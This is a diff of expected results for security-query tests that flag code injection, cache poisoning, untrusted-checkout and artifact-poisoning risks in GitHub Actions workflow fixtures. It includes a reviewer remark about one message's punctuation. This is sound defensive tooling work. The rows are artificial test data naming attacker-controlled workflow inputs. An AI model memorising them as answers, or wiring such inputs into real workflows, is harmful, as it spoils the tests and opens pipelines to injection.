github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 5c5c26edb4e..9cfac091f67 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -7,4 +7,4 @@ nodes | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index cc5ce9bdf87..6b1a3e87313 100644 
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -44,10 +44,10 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 418aeeea059..da66ff822a3 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
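Review bot: The seven added `#select` rows in this hunk expect the message `... due to privilege checkout of untrusted code. ($@).`, so the sentence is closed before the event placeholder and a second period follows it. The other expectations updated in this commit keep the placeholder inside the sentence (`... on a privileged workflow ($@).`, `... controlled by an external user ($@).`). The text presumably comes from the query's select clause, which is not visible here, so the fix would go there: drop the period before the placeholder, as in `... due to privileged checkout of untrusted code ($@).`, then regenerate this file. "privilege checkout" also reads like a typo for "privileged checkout".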
+++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -97,13 +97,13 @@ edges | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. 
| -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index 3a001efbbe8..4f7149b6980 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -1,2 +1,2 @@ -| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index fd3c1fbc195..aa0057d60a1 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -52,20 +52,20 @@ nodes | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | -| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | -| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | -| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | -| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew 